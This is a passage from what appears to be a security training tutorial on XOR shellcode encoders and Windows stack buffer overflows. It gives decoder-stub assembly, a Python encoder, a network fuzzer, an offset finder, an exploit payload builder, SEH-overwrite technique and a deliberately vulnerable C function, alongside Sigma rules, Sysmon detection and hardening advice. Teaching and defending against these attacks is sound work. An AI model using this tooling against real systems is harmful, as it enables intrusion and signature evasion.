    xor  byte [esi], al        ; decode data byte 1
    inc  esi
    cmp  byte [esi], 0x90      ; end-marker (raw, unencoded NOP)?
    jne  decode_chunk
    jmp  payload_start         ; first decoded byte

| Scheme | Pro | Con |
|---|---|---|
| Fixed single key | Smallest stub; one xor per byte | Fails when bad-char set is dense |
| Per-chunk key | Survives tight bad-char sets | Larger blob (one key byte per chunk); bigger stub |
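The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead. One caveat about the listing above: decoding in place leaves every key byte sitting between the decoded chunks, so the result is not yet a contiguous instruction stream. A working decoder writes the decoded bytes to a separate, packed destination (the approach in Section 8) and jumps there.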
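The layout is easier to reason about as a round trip in Python before touching assembly. This is a teaching model under stated assumptions: two-byte chunks, 0x90 as the marker, the benign exit(0) bytes from Section 4, and function names I invented. The decoder here writes to a separate packed output and checks the marker only at key positions.

```python
def encode_chunks(sc: bytes, bad: set, marker: int = 0x90, n: int = 2) -> bytes:
    """Emit [key][n data bytes] per chunk, then the raw marker."""
    if len(sc) % n:
        raise ValueError("pad the payload to a multiple of the chunk size first")
    out = bytearray()
    for i in range(0, len(sc), n):
        chunk = sc[i:i + n]
        # The key must be clean itself, must not equal the marker,
        # and must not turn any byte of this chunk into a bad char.
        key = next((k for k in range(1, 256)
                    if k not in bad and k != marker
                    and all((b ^ k) not in bad for b in chunk)), None)
        if key is None:
            raise ValueError(f"no clean key for chunk at offset {i}")
        out.append(key)
        out.extend(b ^ key for b in chunk)
    out.append(marker)
    return bytes(out)


def decode_chunks(blob: bytes, marker: int = 0x90, n: int = 2) -> bytes:
    """Model of the decoder: read key, XOR n bytes into a packed output, repeat."""
    out, i = bytearray(), 0
    while blob[i] != marker:            # marker is tested only where a key would sit
        key = blob[i]
        out.extend(b ^ key for b in blob[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)


shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # benign exit(0)
bad_chars = {0x00, 0x0a, 0x0d}
blob = encode_chunks(shellcode, bad_chars)
print(blob.hex(), decode_chunks(blob) == shellcode)
```

The size cost is visible immediately: eight payload bytes become thirteen on the wire (four keys plus the marker).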
8. Stack-Based Decoding
In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.
decoder:
    pop  esi                   ; ESI -> encoded payload
    sub  esp, 0x200            ; reserve 512 bytes of scratch
    mov  edi, esp              ; EDI -> destination buffer
    xor  edx, edx              ; offset = 0
copy_decode:
    mov  al, [esi + edx]       ; fetch encoded byte
    cmp  al, 0xcc              ; raw end-marker?
    je   run
    xor  al, 0xaa              ; decode with key
    mov  [edi + edx], al       ; write to stack
    inc  edx
    jmp  copy_decode
run:
    jmp  edi                   ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest: you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).
9. shikata_ga_nai: the State of the Art
The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:
- Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
- Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, a deliberate jab at emulators that don’t model the FPU.
You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.
10. Detection and Defense: What the Blue Team Sees
The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).
| Behavior | What it reveals |
|---|---|
| Tight xor/inc/loop over a code region | Classic fixed-key decoder stub |
| Region transitions writable → executable | Decoded payload about to run |
| Execution from unbacked memory | Code with no file on disk behind it |
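The first row of that table is simple enough to hunt for statically. Here is a rough sketch that looks for the byte shape of xor byte [reg], imm8 followed by inc reg and a backward loop; the pattern covers only the plain-register addressing forms, does not check that both instructions use the same register, and find_xor_loops is a hypothetical name.

```python
import re

# xor byte [reg], imm8 ; inc reg ; loop <backwards>
DECODER_RE = re.compile(
    rb"\x80[\x30-\x33\x36\x37]."      # 80 /6 ib with a plain [reg] operand
    rb"[\x40-\x43\x46\x47]"           # inc eax/ecx/edx/ebx/esi/edi
    rb"\xe2[\x80-\xff]",              # loop rel8 with a negative displacement
    re.DOTALL,
)


def find_xor_loops(blob: bytes):
    """Return (offset, key) pairs for every fixed-key decoder loop shape found."""
    return [(m.start(), m.group()[2]) for m in DECODER_RE.finditer(blob)]


# The assembled JMP-CALL-POP stub from Section 5, used as a known-positive sample.
stub = (b"\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
        b"\xe8\xee\xff\xff\xff")
for offset, key in find_xor_loops(stub):
    print(f"decoder loop at offset {offset}, key {key:#04x}")
```

A match also hands you the key, so the payload that follows can be decoded for triage without executing anything. Polymorphic encoders will not match, which is the argument for the behavioral rows in the table.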
Sysmon Event IDs
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Loader/injector process spawn |
| 7 | Image Loaded | DLLs from temp/download paths into system processes |
| 8 | CreateRemoteThread | Thread created in another process; low-volume, high-signal |
| 10 | ProcessAccess | Cross-process memory access; inspect GrantedAccess and CallTrace |
| 25 | ProcessTampering | In-memory image diverges from disk (hollowing / in-memory decode) |
Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.
Sigma Rule
title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
    product: windows
    category: process_access
detection:
    selection:
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    condition: selection
level: high
tags:
    - attack.t1055
A CallTrace of UNKNOWN means the access originated from unbacked memory: no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
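For quick hunting outside a SIEM, the same selection logic can be prototyped against parsed Sysmon Event ID 10 records. A minimal sketch, assuming each event has already been parsed into a plain dict with GrantedAccess and CallTrace string fields; the function name and the sample event are illustrative.

```python
SUSPICIOUS_ACCESS = {0x147A, 0x1F3FFF}  # the two masks listed in the rule


def matches_rule(event: dict) -> bool:
    """Return True when a parsed Event ID 10 record satisfies the rule's selection."""
    try:
        access = int(event.get("GrantedAccess", "0"), 16)  # accepts '0x147a' or '147a'
    except ValueError:
        return False
    return access in SUSPICIOUS_ACCESS and "UNKNOWN" in event.get("CallTrace", "")


sample_event = {
    "GrantedAccess": "0x147a",
    "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001F2A1B30000)",
}
print(matches_rule(sample_event))
```

Comparing the mask numerically rather than as a string avoids misses caused by differences in letter case or zero padding between log sources.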
ETW providers
| Provider | Purpose |
|---|---|
| Microsoft-Windows-Threat-Intelligence | Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs |
| Microsoft-Windows-Security-Auditing | Event ID 4688 process creation with command line |
| AMSI | Inspects script content after deobfuscation, before execution |
Hardening
- bcdedit /set nx AlwaysOn: system-wide DEP/NX blocks execution of decoded stack/heap output.
- Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy: forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
- Code Integrity Guard (CIG) via ProcessSignaturePolicy: blocks unsigned image loads.
- Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
- Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons: the residue a decoded payload leaves behind.

11. Tools
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86/x64 decoder stubs | nasm.us |
| GDB + pwndbg | Single-step the decode loop, inspect ESI/ECX | gdb.gnu.org |
| objdump / objcopy | Disassemble stubs, extract .text bytes | gnu.org |
| Capstone | Programmatic opcode audit for bad chars | capstone-engine.org |
| pwntools | Encoder/exploit automation (pwnlib.encoders) | docs.pwntools.com |
| pe-sieve / Moneta | Scan live processes for RWX / unbacked memory | github.com |
| Sysmon | Endpoint telemetry for Event IDs 8, 10, 25 | learn.microsoft.com |
12. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Obfuscated Files or Information | T1027 | Entropy/structure anomalies; encoded blob with decoder prefix |
| Encrypted/Encoded File | T1027.013 | Static scan for XOR-loop stub patterns near high-entropy data |
| Deobfuscate/Decode Files or Information | T1140 | Self-modifying memory; ACG violations; ETW VirtualProtect |
| Process Injection | T1055 | Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN |
| PE Injection | T1055.002 | Shellcode written into another process; RWX region creation |
| Reflective Code Loading | T1620 | Execution from unbacked memory; pe-sieve / Moneta |
Summary
- XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
- The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
- The stub’s own opcodes must be bad-char-clean too: audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
- Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
- Defenders ignore the shifting bytes and hunt the behavior: self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.
Classic Stack Buffer Overflow: Smashing the Stack on Windows
Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline, and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.
1. Windows Memory Layout Primer
Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.
The CPU tracks two stack-relevant registers and one execution register:
- ESP: stack pointer, the current top of stack.
- EBP: base/frame pointer, anchors the current frame.
- EIP: instruction pointer, the address of the next instruction. This is the attacker’s target.
A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.
x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
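The byte ordering can be checked with Python's standard struct module. A minimal sketch; pack_le32 is a hypothetical helper name, and the address is the example value from the paragraph above.

```python
import struct


def pack_le32(address: int) -> bytes:
    """Pack a 32-bit address in little-endian byte order, as x86 stores it."""
    return struct.pack("<I", address)


packed = pack_le32(0x625011AF)
print(packed.hex(" "))  # af 11 50 62

# Unpacking with the same format string recovers the original value.
assert struct.unpack("<I", packed)[0] == 0x625011AF
```

The pwntools helper p32 used later in this tutorial performs the same packing.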
2. Anatomy of a Stack Frame
A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:
| Stack Slot | Description |
|---|---|
| Function arguments | Pushed by caller before CALL |
| Saved EIP (return address) | Pushed implicitly by the CALL instruction |
| Saved EBP | Pushed by callee prologue (PUSH EBP) |
| /GS stack cookie (if present) | Inserted between locals and saved EBP/EIP |
| Local variables / buffers | Allocated by SUB ESP, N |
| ← ESP (stack top) | Grows downward |
The prologue and epilogue, with the /GS cookie check shown, look like this:
; --- Prologue ---
push ebp ; save caller frame pointer
mov ebp, esp ; establish new frame
sub esp, 0x40 ; allocate 64 bytes of locals
mov eax, [__security_cookie]
xor eax, ebp ; cookie ^= EBP (frame-tied canary)
mov [ebp-4], eax ; store cookie above locals
; --- Epilogue ---
mov ecx, [ebp-4]
xor ecx, ebp
call __security_check_cookie ; compare vs master; abort on mismatch
mov esp, ebp
pop ebp ; restore caller frame pointer
ret ; pop saved EIP into instruction pointer
Reading this frame live in WinDbg or x64dbg (inspecting ESP, EBP, and the bytes between locals and the saved return address) is the first skill of exploit development.

3. The Overflow: Why Bounds Checks Matter
The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.
| Identifier | What it does |
|---|---|
| strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking; classic root causes |
| memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled |
Here is the canonical vulnerable pattern defenders must recognize in code review:
#include <string.h>

// DELIBERATELY VULNERABLE: lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];                 // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check: overflow
}
When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.
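The overwrite order on a cookie-less (/GS-) frame can be modeled on a plain byte array. This is a simplified sketch, not a real process: it assumes the layout buffer, saved EBP, saved EIP with no padding, ignores the NUL terminator strcpy would append, and uses made-up frame values.

```python
import struct

BUF_SIZE = 64  # matches char buffer[64] in the C example


def build_frame(saved_ebp: int, saved_eip: int) -> bytearray:
    """Model the frame from low to high address: buffer, saved EBP, saved EIP."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, saved_eip)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic the missing bounds check: write from buffer[0] onward."""
    n = min(len(data), len(frame))  # the model simply stops at the end of the frame
    frame[:n] = data[:n]


def saved_eip(frame: bytearray) -> int:
    """Read the modeled return address (4 bytes past the saved EBP)."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


frame = build_frame(saved_ebp=0x0019FF70, saved_eip=0x00401234)
unchecked_copy(frame, b"A" * 64)   # fits exactly: return address untouched
print(hex(saved_eip(frame)))       # 0x401234
unchecked_copy(frame, b"A" * 72)   # 64 (buffer) + 4 (EBP) + 4 (EIP)
print(hex(saved_eip(frame)))       # 0x41414141
```

Eight bytes past the buffer are enough to replace the return address in this model, which is why the offset step in the methodology matters so much.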
4. Exploit Development Methodology on Windows
The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:
- Fuzz to crash: send increasing-length inputs until the service faults.
- Find the offset: send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
- Confirm EIP control: overwrite with a known marker (0x42424242) and verify.
- Enumerate bad characters: find bytes the protocol mangles (\x00, \x0a, \x0d are common).
- Find a trampoline: locate JMP ESP in a non-ASLR module.
- Build the payload: padding + trampoline address + NOP sled + shellcode.
A minimal network fuzzer:
import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size  # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break
Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):
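from pwn import cyclic, cyclic_find

pattern = cyclic(3000)  # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash ...
# The value must come from the same generator. 0x6161616c is a pwntools-style example;
# a value such as 0x6f43396e ("n9Co") belongs to a Metasploit/mona pattern and is
# resolved with !mona findmsp or pattern_offset instead.
eip_at_crash = 0x6161616c
offset = cyclic_find(eip_at_crash)  # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")
Bad-character enumeration sends the full byte range and diffs it against memory: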
badchar_test = bytes(range(1, 256))  # skip \x00 first
# Send, then in the debugger: d esp -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.
The final builder assembles the pieces. Note the placeholder shellcode: generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:
from pwn import p32
offset = 2003
jmp_esp = 0x625011AF # FF E4 in a non-ASLR module
nop_sled = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]" # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32 # placeholder
payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode
The key opcodes you search modules for:
| Opcode bytes | Instruction | Use |
|---|---|---|
| FF E4 | JMP ESP | Classic return trampoline |
| FF D4 | CALL ESP | Equivalent effect |
| FF E5 | JMP EBP | When EBP points near the buffer |
| EB 06 | Short JMP +6 | Next-SEH jump-over gadget |
When RET executes, it pops the saved return address, which leaves ESP pointing at the attacker-controlled bytes placed immediately after it. Returning into JMP ESP therefore pivots execution straight into the NOP sled and shellcode.
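The opcode table above maps directly onto a byte search, which is roughly what a trampoline finder does. This is a simplified sketch under stated assumptions: find_trampolines is a hypothetical helper, it scans a raw byte blob and does not parse PE sections or check page permissions, and the sample image and base address are synthetic.

```python
TRAMPOLINES = {
    "JMP ESP": b"\xff\xe4",
    "CALL ESP": b"\xff\xd4",
    "JMP EBP": b"\xff\xe5",
}


def find_trampolines(image: bytes, base: int, bad_chars: bytes = b"\x00\x0a\x0d"):
    """Return (name, address) pairs whose little-endian address bytes avoid bad_chars."""
    hits = []
    for name, opcode in TRAMPOLINES.items():
        pos = image.find(opcode)
        while pos != -1:
            addr = base + pos
            addr_bytes = addr.to_bytes(4, "little")  # as it would appear in the buffer
            if not any(b in bad_chars for b in addr_bytes):
                hits.append((name, addr))
            pos = image.find(opcode, pos + 1)
    return hits


# Synthetic "module": filler bytes with one FF E4 planted at offset 0x11AF.
image = b"\x90" * 0x11AF + b"\xff\xe4" + b"\x90"
print([(n, hex(a)) for n, a in find_trampolines(image, base=0x62500000)])
print(find_trampolines(image, base=0x00400000))  # address contains \x00, so it is filtered out
```

The second call shows why modules loaded at low addresses are poor trampoline sources for string-based overflows: the address itself contains a bad character.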

5. Windows Mitigations Deep-Dive
Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.
| Mitigation | Mechanism | Bypass vector (teaching) |
|---|---|---|
| /GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak |
| SafeSEH | PE table of valid SEH handlers; loader validates the handler before dispatch | Trampoline in a module not compiled /SAFESEH |
| SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules |
| DEP/NX (/NXCOMPAT) | Pages are W^X; the stack is non-executable | ROP chain (follow-on topic) |
| ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic) |
/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.
The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.
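The cookie arithmetic from the prologue and epilogue shown in section 2 can be sketched in a few lines. This is a model of the XOR logic only, assuming 32-bit values; the master cookie and EBP below are arbitrary illustrative numbers, and the function names are hypothetical.

```python
MASK32 = 0xFFFFFFFF


def store_cookie(master_cookie: int, ebp: int) -> int:
    """Prologue: the value written to the stack slot is master XOR EBP."""
    return (master_cookie ^ ebp) & MASK32


def cookie_intact(stack_slot: int, ebp: int, master_cookie: int) -> bool:
    """Epilogue: XOR the slot with EBP again and compare against the master cookie."""
    return ((stack_slot ^ ebp) & MASK32) == master_cookie


master = 0x2B992DDF   # illustrative only; the real value is randomized at startup
ebp = 0x0019FF70
slot = store_cookie(master, ebp)

print(cookie_intact(slot, ebp, master))         # untouched frame
print(cookie_intact(0x41414141, ebp, master))   # slot overwritten by a linear overflow
```

Because the stored value depends on both the random master cookie and the frame's EBP, an attacker who overwrites the slot blindly fails the comparison, which is why the bypasses in the table target code paths that run before the epilogue.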

6. SEH-Based Overflow (x86)
On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:
typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next; // next handler in chain
    PEXCEPTION_ROUTINE Handler;                  // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler, bypassing the cookie entirely.
The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. When the dispatcher calls the handler, the third DWORD on the stack ([ESP+8]) is a pointer to the record’s Next SEH field. POP–POP–RET discards the first two slots and returns to that pointer, so the CPU executes the four bytes the attacker wrote into Next SEH: typically a short jump (EB 06, padded with two filler bytes) that hops over the handler address into the shellcode.
SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced with Vista SP1 and Server 2008, on by default for Server 2008 but off by default on the Vista and Windows 7 client editions) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.
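The eight bytes that replace the registration record can be laid out explicitly to see why EB 06 is the usual jump distance. A minimal sketch: build_seh_overwrite is a hypothetical helper and the gadget address is a placeholder, not a real POP–POP–RET location.

```python
import struct


def build_seh_overwrite(pop_pop_ret_addr: int) -> bytes:
    """Return the 8 bytes for the record: Next SEH (short jump) then SE Handler."""
    next_seh = b"\xeb\x06\x90\x90"                    # JMP SHORT +6, two filler bytes
    handler = struct.pack("<I", pop_pop_ret_addr)    # little-endian gadget address
    return next_seh + handler


record = build_seh_overwrite(0x625010B4)  # placeholder address for illustration

# A short jump is 2 bytes long, so EB 06 lands at offset 2 + 6 = 8,
# which is the first byte after the 8-byte record.
jump_len, displacement = 2, record[1]
print(record.hex(" "), "-> lands at offset", jump_len + displacement)
```

The landing offset equals the record length, so whatever follows the record in the buffer is what executes next.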

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary
Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:
- No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
- /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure(). The same input that worked now dies in the epilogue.
Reference debugger and mona.py commands:
0:000> g ; run until crash
0:000> r ; read registers — expect EIP = 41414141
0:000> d esp ; dump stack at ESP — find your buffer
0:000> !exploitable ; triage the crash classification
0:000> bp 0x625011AF ; break on the JMP ESP trampoline
!mona findmsp ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d" ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00" ; generate byte array for badchar diffing
8. Common Attacker Techniques
| Technique | Description |
|---|---|
| Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline |
| SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS |
| Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH |
| Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d) |
| Egghunter / staging | Use a small first-stage to locate or download a larger payload |
| Post-exploit VirtualProtect | Mark injected memory executable to evade software DEP in legacy scenarios |
In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.
9. Defensive Strategies & Detection
Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.
- WER Event ID 1000 (Application Error, Application log): logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
- WER Event ID 1001: records the crash bucket and any captured dump.
Relevant Sysmon events for follow-on activity:
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Shells/payloads spawned from a crashed service |
| 3 | Network Connection | Reverse-shell / C2 egress from shellcode |
| 7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service |
| 8 | CreateRemoteThread | Thread injection by shellcode |
| 10 | Process Access | Shellcode calling OpenProcess on lsass.exe |
| 11 | File Created | Dropped payloads / second-stage binaries |
| 25 | Process Tampering | Process hollowing following the overflow |
Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.
A conceptual Sigma rule keying on repeated crashes of a network-facing service:
title: Repeated Application Crash on Network-Facing Service
logsource:
    product: windows
    service: application
detection:
    selection:
        EventID: 1000
        Application|contains: 'vulnservice.exe'
        ExceptionCode: '0xc0000005'
    condition: selection | count() > 3 by Application within 1m
falsepositives:
    - Legitimate software bugs
level: medium
tags:
    - attack.initial_access
    - attack.t1190
Hardening Steps
- Force WDEG / Exploit Protection on network-facing services (mandatory DEP, force-ASLR, SEHOP, heap-spray protection) via Set-ProcessMitigation.
- Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
- Verify SEHOP: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
- Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
- Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
- Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
- Run services least-privilege so successful exploitation yields minimal access.
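The crash-burst idea behind the conceptual Sigma rule and the SIEM alerting step can be prototyped as a sliding-window counter. A minimal sketch, assuming events arrive as time-ordered (timestamp in seconds, application name) tuples already filtered to Event ID 1000 access violations; the function name and thresholds are illustrative.

```python
from collections import defaultdict, deque


def crash_bursts(events, threshold=3, window_s=60):
    """Yield-style helper: return (timestamp, app, count) whenever an app exceeds
    `threshold` crashes inside the trailing `window_s` seconds."""
    recent = defaultdict(deque)  # per-application timestamps inside the window
    alerts = []
    for ts, app in events:
        q = recent[app]
        q.append(ts)
        while q and ts - q[0] > window_s:  # drop crashes that fell out of the window
            q.popleft()
        if len(q) > threshold:
            alerts.append((ts, app, len(q)))
    return alerts


burst = [(0, "vulnservice.exe"), (10, "vulnservice.exe"),
         (20, "vulnservice.exe"), (30, "vulnservice.exe")]
print(crash_bursts(burst))

slow = [(0, "vulnservice.exe"), (100, "vulnservice.exe"),
        (200, "vulnservice.exe"), (300, "vulnservice.exe")]
print(crash_bursts(slow))
```

Keying the window per application keeps one noisy, buggy program from masking a burst against the network-facing service you actually care about.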
10. Tools for Stack Overflow Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com |
| x64dbg | User-mode debugger for live frame inspection | x64dbg.com |
| mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com |
| pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com |
| ROPgadget | Gadget discovery for DEP-bypass chains | github.com |
| Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org |
| Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com |
11. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts |
| Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children |
| Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1 |
| Endpoint DoS: Application Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000) |
| Exploit Protection (mitigation) | M1050 | DEP/ASLR/SEHOP//GS enforced via WDEG telemetry |
Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.
Summary
- A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
